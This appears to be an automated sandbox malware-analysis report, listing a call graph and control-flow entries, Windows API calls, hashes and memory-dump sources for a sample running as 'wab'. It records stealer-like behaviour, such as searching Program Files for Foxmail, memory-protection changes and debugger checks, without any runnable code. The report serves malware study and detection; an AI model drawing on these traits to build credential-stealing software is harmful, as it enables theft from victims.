20ea5af6 _abort 38 API calls 6622->6623 6624 20ea766a 6623->6624 6624->6589 6626 20ea77fd 6625->6626 6627 20ea7834 6625->6627 6626->6587 6626->6591 6626->6593 6647 20ea56b9 RtlLeaveCriticalSection 6627->6647 6630 20ea2ada _ValidateLocalCookies 5 API calls 6629->6630 6631 20eabdd4 6630->6631 6631->6631 6633 20ea5b7a _abort 20 API calls 6632->6633 6634 20ea6247 6633->6634 6635 20ea62a6 6634->6635 6638 20ea6255 6634->6638 6643 20ea62bc IsProcessorFeaturePresent 6635->6643 6637 20ea62ab 6639 20ea6231 _abort 26 API calls 6637->6639 6641 20ea2ada _ValidateLocalCookies 5 API calls 6638->6641 6640 20ea62b8 6639->6640 6640->6619 6642 20ea627c 6641->6642 6642->6619 6644 20ea62c7 6643->6644 6645 20ea60e2 _abort 8 API calls 6644->6645 6646 20ea62dc GetCurrentProcess TerminateProcess 6645->6646 6646->6637 6647->6626 6649 20ea49a7 _abort 6648->6649 6656 20ea49bf 6649->6656 6670 20ea4af5 GetModuleHandleW 6649->6670 6653 20ea4a65 6687 20ea4aa5 6653->6687 6679 20ea5671 RtlEnterCriticalSection 6656->6679 6658 20ea4a3c 6660 20ea4a54 6658->6660 6683 20ea4669 6658->6683 6659 20ea49c7 6659->6653 6659->6658 6680 20ea527a 6659->6680 6666 20ea4669 _abort 5 API calls 6660->6666 6661 20ea4aae 6664 20eabdc9 _abort 5 API calls 6661->6664 6662 20ea4a82 6690 20ea4ab4 6662->6690 6669 20ea4ab3 6664->6669 6666->6653 6671 20ea49b3 6670->6671 6671->6656 6672 20ea4b39 GetModuleHandleExW 6671->6672 6673 20ea4b63 GetProcAddress 6672->6673 6674 20ea4b78 6672->6674 6673->6674 6675 20ea4b8c FreeLibrary 6674->6675 6676 20ea4b95 6674->6676 6675->6676 6677 20ea2ada _ValidateLocalCookies 5 API calls 6676->6677 6678 20ea4b9f 6677->6678 6678->6656 6679->6659 6698 20ea5132 6680->6698 6684 20ea4698 6683->6684 6685 20ea2ada _ValidateLocalCookies 5 API calls 6684->6685 6686 20ea46c1 6685->6686 6686->6660 6719 20ea56b9 RtlLeaveCriticalSection 6687->6719 6689 20ea4a7e 6689->6661 6689->6662 6720 20ea6025 6690->6720 6693 20ea4ae2 6696 20ea4b39 _abort 8 API calls 6693->6696 6694 20ea4ac2 GetPEB 6694->6693 6695 20ea4ad2 GetCurrentProcess TerminateProcess 6694->6695 6695->6693 6697 20ea4aea ExitProcess 6696->6697 6701 20ea50e1 6698->6701 6700 20ea5156 6700->6658 6702 20ea50ed ___scrt_is_nonwritable_in_current_image 6701->6702 6709 20ea5671 RtlEnterCriticalSection 6702->6709 6704 20ea50fb 6710 20ea515a 6704->6710 6708 20ea5119 _abort 6708->6700 6709->6704 6711 20ea517a 6710->6711 6715 20ea5182 6710->6715 6712 20ea2ada _ValidateLocalCookies 5 API calls 6711->6712 6713 20ea5108 6712->6713 6716 20ea5126 6713->6716 6714 20ea571e _free 20 API calls 6714->6711 6715->6711 6715->6714 6717 20ea56b9 _abort RtlLeaveCriticalSection 6716->6717 6718 20ea5130 6717->6718 6718->6708 6719->6689 6721 20ea604a 6720->6721 6722 20ea6040 6720->6722 6723 20ea5c45 _abort 5 API calls 6721->6723 6724 20ea2ada _ValidateLocalCookies 5 API calls 6722->6724 6723->6722 6725 20ea4abe 6724->6725 6725->6693 6725->6694 6726->6520 6730 20ea56b9 RtlLeaveCriticalSection 6727->6730 6729 20ea6e16 6729->6520 6730->6729 6732 20ea54ba 6731->6732 6733 20ea54c4 6731->6733 6732->6529 6732->6530 6733->6732 6734 20ea5af6 _abort 38 API calls 6733->6734 6735 20ea54e5 6734->6735 6739 20ea7a00 6735->6739 6740 20ea54fe 6739->6740 6741 20ea7a13 6739->6741 6743 20ea7a2d 6740->6743 6741->6740 6747 20ea7f0f 6741->6747 6744 20ea7a40 6743->6744 6745 20ea7a55 6743->6745 6744->6745 6746 20ea6d7e __fassign 38 API calls 6744->6746 6745->6732 6746->6745 6748 20ea7f1b ___scrt_is_nonwritable_in_current_image 6747->6748 6749 20ea5af6 _abort 38 API calls 6748->6749 6750 20ea7f24 6749->6750 6752 20ea7f72 _abort 6750->6752 6759 20ea5671 RtlEnterCriticalSection 6750->6759 6752->6740 6753 20ea7f42 6760 20ea7f86 6753->6760 6758 20ea55a8 _abort 38 API calls 6758->6752 6759->6753 6761 20ea7f56 6760->6761 6762 20ea7f94 __fassign 6760->6762 6764 20ea7f75 6761->6764 6762->6761 6763 20ea7cc2 __fassign 20 API calls 6762->6763 6763->6761 6767 20ea56b9 RtlLeaveCriticalSection 6764->6767 6766 20ea7f69 6766->6752 6766->6758 6767->6766 6769 20ea6baf 6768->6769 6773 20ea6b05 6768->6773 6772 20ea2ada _ValidateLocalCookies 5 API calls 6769->6772 6775 20ea6c5b 6772->6775 6778 20ea86e4 6773->6778 6775->6547 6777 20ea8a3e 43 API calls 6777->6769 6779 20ea54a7 __fassign 38 API calls 6778->6779 6780 20ea8704 MultiByteToWideChar 6779->6780 6782 20ea8742 6780->6782 6790 20ea87da 6780->6790 6783 20ea8763 ___scrt_fastfail 6782->6783 6785 20ea56d0 21 API calls 6782->6785 6787 20ea87d4 6783->6787 6789 20ea87a8 MultiByteToWideChar 6783->6789 6784 20ea2ada _ValidateLocalCookies 5 API calls 6786 20ea6b66 6784->6786 6785->6783 6792 20ea8a3e 6786->6792 6797 20ea8801 6787->6797 6789->6787 6791 20ea87c4 GetStringTypeW 6789->6791 6790->6784 6791->6787 6793 20ea54a7 __fassign 38 API calls 6792->6793 6794 20ea8a51 6793->6794 6801 20ea8821 6794->6801 6798 20ea881e 6797->6798 6799 20ea880d 6797->6799 6798->6790 6799->6798 6800 20ea571e _free 20 API calls 6799->6800 6800->6798 6803 20ea883c 6801->6803 6802 20ea8862 MultiByteToWideChar 6804 20ea8a16 6802->6804 6805 20ea888c 6802->6805 6803->6802 6806 20ea2ada _ValidateLocalCookies 5 API calls 6804->6806 6808 20ea56d0 21 API calls 6805->6808 6811 20ea88ad 6805->6811 6807 20ea6b87 6806->6807 6807->6777 6808->6811 6809 20ea8962 6814 20ea8801 __freea 20 API calls 6809->6814 6810 20ea88f6 MultiByteToWideChar 6810->6809 6812 20ea890f 6810->6812 6811->6809 6811->6810 6828 20ea5f19 6812->6828 6814->6804 6816 20ea8939 6816->6809 6818 20ea5f19 11 API calls 6816->6818 6817 20ea8971 6820 20ea56d0 21 API calls 6817->6820 6823 20ea8992 6817->6823 6818->6809 6819 20ea8a07 6822 20ea8801 __freea 20 API calls 6819->6822 6820->6823 6821 20ea5f19 11 API calls 6824 20ea89e6 6821->6824 6822->6809 6823->6819 6823->6821 6824->6819 6825 20ea89f5 WideCharToMultiByte 6824->6825 6825->6819 6826 20ea8a35 6825->6826 6827 20ea8801 __freea 20 API calls 6826->6827 6827->6809 6829 20ea5c45 _abort 5 API calls 6828->6829 6830 20ea5f40 6829->6830 6831 20ea5f49 6830->6831 6836 20ea5fa1 6830->6836 6834 20ea2ada _ValidateLocalCookies 5 API calls 6831->6834 6835 20ea5f9b 6834->6835 6835->6809 6835->6816 6835->6817 6837 20ea5c45 _abort 5 API calls 6836->6837 6838 20ea5fc8 6837->6838 6839 20ea2ada _ValidateLocalCookies 5 API calls 6838->6839 6840 20ea5f89 LCMapStringW 6839->6840 6840->6831 6842 20ea6892 ___scrt_is_nonwritable_in_current_image 6841->6842 6849 20ea5671 RtlEnterCriticalSection 6842->6849 6844 20ea689c 6850 20ea68f1 6844->6850 6848 20ea68b5 _abort 6848->6552 6849->6844 6862 20ea7011 6850->6862 6852 20ea693f 6853 20ea7011 26 API calls 6852->6853 6854 20ea695b 6853->6854 6855 20ea7011 26 API calls 6854->6855 6856 20ea6979 6855->6856 6857 20ea68a9 6856->6857 6858 20ea571e _free 20 API calls 6856->6858 6859 20ea68bd 6857->6859 6858->6857 6876 20ea56b9 RtlLeaveCriticalSection 6859->6876 6861 20ea68c7 6861->6848 6863 20ea7022 6862->6863 6867 20ea701e 6862->6867 6864 20ea7029 6863->6864 6868 20ea703c ___scrt_fastfail 6863->6868 6865 20ea6368 _free 20 API calls 6864->6865 6866 20ea702e 6865->6866 6869 20ea62ac _abort 26 API calls 6866->6869 6867->6852 6868->6867 6870 20ea706a 6868->6870 6871 20ea7073 6868->6871 6869->6867 6872 20ea6368 _free 20 API calls 6870->6872 6871->6867 6874 20ea6368 _free 20 API calls 6871->6874 6873 20ea706f 6872->6873 6875 20ea62ac _abort 26 API calls 6873->6875 6874->6873 6875->6867 6876->6861 6878 20ea545a 6877->6878 6880 20ea5468 6877->6880 6878->6880 6884 20ea547f 6878->6884 6879 20ea6368 _free 20 API calls 6881 20ea5470 6879->6881 6880->6879 6882 20ea62ac _abort 26 API calls 6881->6882 6883 20ea547a 6882->6883 6883->6472 6884->6883 6885 20ea6368 _free 20 API calls 6884->6885 6885->6881 6887 20ea500d 6886->6887 6891 20ea4fd7 6886->6891 6888 20ea5024 6887->6888 6889 20ea571e _free 20 API calls 6887->6889 6890 20ea571e _free 20 API calls 6888->6890 6889->6887 6890->6891 6891->6471 7294 20ea73d5 7295 20ea73e1 ___scrt_is_nonwritable_in_current_image 7294->7295 7306 20ea5671 RtlEnterCriticalSection 7295->7306 7297 20ea73e8 7307 20ea8be3 7297->7307 7299 20ea73f7 7305 20ea7406 7299->7305 7320 20ea7269 GetStartupInfoW 7299->7320 7302 20ea7417 _abort 7331 20ea7422 7305->7331 7306->7297 7308 20ea8bef ___scrt_is_nonwritable_in_current_image 7307->7308 7309 20ea8bfc 7308->7309 7310 20ea8c13 7308->7310 7312 20ea6368 _free 20 API calls 7309->7312 7334 20ea5671 RtlEnterCriticalSection 7310->7334 7314 20ea8c01 7312->7314 7313 20ea8c1f 7319 20ea8c4b 7313->7319 7335 20ea8b34 7313->7335 7315 20ea62ac _abort 26 API calls 7314->7315 7317 20ea8c0b _abort 7315->7317 7317->7299 7342 20ea8c72 7319->7342 7321 20ea7318 7320->7321 7322 20ea7286 7320->7322 7326 20ea731f 7321->7326 7322->7321 7323 20ea8be3 27 API calls 7322->7323 7324 20ea72af 7323->7324 7324->7321 7325 20ea72dd GetFileType 7324->7325 7325->7324 7327 20ea7326 7326->7327 7328 20ea7369 GetStdHandle 7327->7328 7329 20ea73d1 7327->7329 7330 20ea737c GetFileType 7327->7330 7328->7327 7329->7305 7330->7327 7346 20ea56b9 RtlLeaveCriticalSection 7331->7346 7333 20ea7429 7333->7302 7334->7313 7336 20ea637b _abort 20 API calls 7335->7336 7338 20ea8b46 7336->7338 7337 20ea8b53 7339 20ea571e _free 20 API calls 7337->7339 7338->7337 7340 20ea5eb7 11 API calls 7338->7340 7341 20ea8ba5 7339->7341 7340->7338 7341->7313 7345 20ea56b9 RtlLeaveCriticalSection 7342->7345 7344 20ea8c79 7344->7317 7345->7344 7346->7333

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 20EA1137
                                      • lstrcatW.KERNEL32(?,?), ref: 20EA1151
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20EA115C
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20EA116D
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20EA117C
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20EA1193
                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 20EA11D0
                                      • FindClose.KERNEL32(00000000), ref: 20EA11DB
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                      • String ID:
                                      • API String ID: 1083526818-0
                                      • Opcode ID: 3055a6732df5c33e08236c2ace1bfa96abdd75b424a7f0c5ced5430e3324ee4c
                                      • Instruction ID: 898b9a6521aa177a3b9df3037c6092b4d1e200b95a8caf6eeba09907022fe24b
                                      • Opcode Fuzzy Hash: 3055a6732df5c33e08236c2ace1bfa96abdd75b424a7f0c5ced5430e3324ee4c
                                      • Instruction Fuzzy Hash: EF21A7725083086BD710DBA49C4DF9F7BDDEF48314F100929F659D7190EB34D6888796

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 127 4b422d5-4b42302 128 4b42304-4b42316 call 4b41c4c 127->128 130 4b42322-4b4232b 128->130 131 4b42318-4b4231f 128->131 132 4b4232d-4b42339 Sleep 130->132 133 4b4233b-4b4238a NtProtectVirtualMemory call 4b41c4c 130->133 131->130 132->127 136 4b4238f-4b423a0 133->136 136->127
                                      APIs
                                      • Sleep.KERNEL32(00000005), ref: 04B42334
                                      • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 04B42385
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3423964489.0000000004633000.00000040.00000400.00020000.00000000.sdmp, Offset: 04633000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_4633000_wab.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MemoryProtectSleepVirtual
                                      • String ID:
                                      • API String ID: 3235210055-0
                                      • Opcode ID: 8f574a2177d45f5efd62cbd6522568118284a9f88de088da3d1de203f96c6ff7
                                      • Instruction ID: 737240982d4a6320141af42457a6a6a8b2d4f27456b29b1a7eeca604ce9c0b71
                                      • Opcode Fuzzy Hash: 8f574a2177d45f5efd62cbd6522568118284a9f88de088da3d1de203f96c6ff7
                                      • Instruction Fuzzy Hash: 821122715053019FEB109E38CD8DB8673A2AF053E8F9582C9EDA14B0F6D768C8C4DB12

                                      Control-flow Graph

                                      APIs
                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 20EA1434
                                        • Part of subcall function 20EA10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 20EA1137
                                        • Part of subcall function 20EA10F1: lstrcatW.KERNEL32(?,?), ref: 20EA1151
                                        • Part of subcall function 20EA10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20EA115C
                                        • Part of subcall function 20EA10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20EA116D
                                        • Part of subcall function 20EA10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 20EA117C
                                        • Part of subcall function 20EA10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 20EA1193
                                        • Part of subcall function 20EA10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 20EA11D0
                                        • Part of subcall function 20EA10F1: FindClose.KERNEL32(00000000), ref: 20EA11DB
                                      • lstrlenW.KERNEL32(?), ref: 20EA14C5
                                      • lstrlenW.KERNEL32(?), ref: 20EA14E0
                                      • lstrlenW.KERNEL32(?,?), ref: 20EA150F
                                      • lstrcatW.KERNEL32(00000000), ref: 20EA1521
                                      • lstrlenW.KERNEL32(?,?), ref: 20EA1547
                                      • lstrcatW.KERNEL32(00000000), ref: 20EA1553
                                      • lstrlenW.KERNEL32(?,?), ref: 20EA1579
                                      • lstrcatW.KERNEL32(00000000), ref: 20EA1585
                                      • lstrlenW.KERNEL32(?,?), ref: 20EA15AB
                                      • lstrcatW.KERNEL32(00000000), ref: 20EA15B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                      • String ID: )$Foxmail$ProgramFiles
                                      • API String ID: 672098462-2938083778
                                      • Opcode ID: 32b43c05359fd40cff04b26bf20ee83c6e21d86378d71e79e18f1a4d47c385f3
                                      • Instruction ID: ade26450077ec111ae750123fe9f7c0a90056f18c19051684a0e62e8654aed0f
                                      • Opcode Fuzzy Hash: 32b43c05359fd40cff04b26bf20ee83c6e21d86378d71e79e18f1a4d47c385f3
                                      • Instruction Fuzzy Hash: 8A817071A40358A9DB20DBE09C86FDF73B9EF88710F10059AF509FB190EA715AD4CB95

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(20EAC7DD), ref: 20EAC7E6
                                      • GetModuleHandleA.KERNEL32(?,20EAC7DD), ref: 20EAC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 20EAC860
                                        • Part of subcall function 20EAC803: GetProcAddress.KERNEL32(00000000,20EAC7F4), ref: 20EAC804
                                        • Part of subcall function 20EAC803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,20EAC7F4,20EAC7DD), ref: 20EAC816
                                        • Part of subcall function 20EAC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,20EAC7F4,20EAC7DD), ref: 20EAC82A
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction ID: ddd4eaf9d9f334b6281d78cd6c4cd837ce3d70d56468d99b0afd646cdf629f6f
                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction Fuzzy Hash: 7B01450094534078AB1D53F40C02EBA5FD8BB2F664B101796F210EF193C9ACAAC2C3F6

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 79 20eac7a7-20eac7bc 80 20eac7be-20eac7c6 79->80 81 20eac82d 79->81 80->81 83 20eac7c8-20eac7f6 call 20eac7e6 80->83 82 20eac82f-20eac833 81->82 84 20eac872 call 20eac877 82->84 85 20eac835-20eac83d GetModuleHandleA 82->85 91 20eac7f8 83->91 92 20eac86c-20eac86e 83->92 88 20eac83f-20eac847 85->88 88->88 90 20eac849-20eac84c 88->90 90->82 95 20eac84e-20eac850 90->95 96 20eac7fa-20eac7fe 91->96 97 20eac85b-20eac85e 91->97 93 20eac870 92->93 94 20eac866-20eac86b 92->94 93->90 94->92 100 20eac852-20eac854 95->100 101 20eac856-20eac85a 95->101 102 20eac800-20eac80b GetProcAddress 96->102 103 20eac865 96->103 99 20eac85f-20eac860 GetProcAddress 97->99 99->103 100->99 101->97 102->81 104 20eac80d-20eac81a VirtualProtect 102->104 103->94 105 20eac82c 104->105 106 20eac81c-20eac82a VirtualProtect 104->106 105->81 106->105
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,20EAC7DD), ref: 20EAC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 20EAC860
                                        • Part of subcall function 20EAC7E6: GetModuleHandleA.KERNEL32(20EAC7DD), ref: 20EAC7E6
                                        • Part of subcall function 20EAC7E6: GetProcAddress.KERNEL32(00000000,20EAC7F4), ref: 20EAC804
                                        • Part of subcall function 20EAC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,20EAC7F4,20EAC7DD), ref: 20EAC816
                                        • Part of subcall function 20EAC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,20EAC7F4,20EAC7DD), ref: 20EAC82A
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction ID: 5f0433f6163cc5c275bbdb860745ab2818792a8115f0b071adbe6e9d7adc45ac
                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction Fuzzy Hash: 992136224083816FEB198BF44C01BA67FD8FB1F364F180696E140DF143D5ACA9C6C3A2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 107 20eac803-20eac80b GetProcAddress 108 20eac82d 107->108 109 20eac80d-20eac81a VirtualProtect 107->109 112 20eac82f-20eac833 108->112 110 20eac82c 109->110 111 20eac81c-20eac82a VirtualProtect 109->111 110->108 111->110 113 20eac872 call 20eac877 112->113 114 20eac835-20eac83d GetModuleHandleA 112->114 116 20eac83f-20eac847 114->116 116->116 117 20eac849-20eac84c 116->117 117->112 118 20eac84e-20eac850 117->118 119 20eac852-20eac854 118->119 120 20eac856-20eac85e 118->120 122 20eac85f-20eac865 GetProcAddress 119->122 120->122 124 20eac866-20eac86e 122->124 126 20eac870 124->126 126->117
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,20EAC7F4), ref: 20EAC804
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,20EAC7F4,20EAC7DD), ref: 20EAC816
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,20EAC7F4,20EAC7DD), ref: 20EAC82A
                                      • GetModuleHandleA.KERNEL32(?,20EAC7DD), ref: 20EAC838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 20EAC860
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProcProtectVirtual$HandleModule
                                      • String ID:
                                      • API String ID: 2152742572-0
                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction ID: 61255e25defcffe4fb1157abee7118265d23969a984d4f429c6cd4c223f1fd18
                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction Fuzzy Hash: C5F0F6415457407CFA1946F41C42EB65FCCAB2F664B201A56F210CF183D89DA9C693F6
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 20EA61DA
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 20EA61E4
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 20EA61F1
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 7e04ea03c71b330442eb55709df27693f76f59dea226cb7f93a5a9f34a7d36ca
                                      • Instruction ID: 066687109d31adcc907481b21becf768999c66f25306ab767e856467b32cb8dc
                                      • Opcode Fuzzy Hash: 7e04ea03c71b330442eb55709df27693f76f59dea226cb7f93a5a9f34a7d36ca
                                      • Instruction Fuzzy Hash: 0431D57590121C9BCB21DF68D98978DBBB4BF18310F5041DAE81DAB260EB349FC58F55
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,20EA4A8A,?,20EB2238,?,20EA4BBD,00000000,00000000,00000001,20EA2082,20EB2108,?,20EA1F3A,?), ref: 20EA4AD5
                                      • TerminateProcess.KERNEL32(00000000,?,20EA4A8A,?,20EB2238,?,20EA4BBD,00000000,00000000,00000001,20EA2082,20EB2108,?,20EA1F3A,?), ref: 20EA4ADC
                                      • ExitProcess.KERNEL32 ref: 20EA4AEE
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 45ee48a0cecb07f873b095dfd1838d4d2271ab97750d267b2c783956d56fa9a2
                                      • Instruction ID: 66ce4d92371c5893bef94fd3d0614c599524289a55b2d49a51c6cb6d1f1f75e2
                                      • Opcode Fuzzy Hash: 45ee48a0cecb07f873b095dfd1838d4d2271ab97750d267b2c783956d56fa9a2
                                      • Instruction Fuzzy Hash: E9E04672008608AFCF016FA4CD89A893B6BEF88341F004010FE079B131EB39EDC6EA54
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 528fd77afd1e3f94cb21560c574a0f5e990b437e684e08fe6cb627e63e7713f3
                                      • Instruction ID: 917b3246ae412bf1089535eb52ad282d1fa82aab2c5b53f86c00d10774d1b701
                                      • Opcode Fuzzy Hash: 528fd77afd1e3f94cb21560c574a0f5e990b437e684e08fe6cb627e63e7713f3
                                      • Instruction Fuzzy Hash: CB31F8B1900109AFCB148FB8CC85EEA7BBDDF8A318F1041ADF919DB351E6319E858B50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3444625509.0000000020EA1000.00000040.00001000.00020000.00000000.sdmp, Offset: 20EA0000, based on PE: true
                                      • Associated: 0000000B.00000002.3444599739.0000000020EA0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3444625509.0000000020EB6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_20ea0000_wab.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: e96c506803caeba9c59fe890247133c070fcde4eb791cea1f431c9822d36d221
                                      • Instruction ID: 3131b2e5c33a00883176bf1f720cfdaca5b041a793694bd83f122419061c5a0f
                                      • Opcode Fuzzy Hash: e96c506803caeba9c59fe890247133c070fcde4eb791cea1f431c9822d36d221
                                      • Instruction Fuzzy Hash: 48A012317085028F43044F304E4A20D35EF77081807004214540BC0020EB38C0846600

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
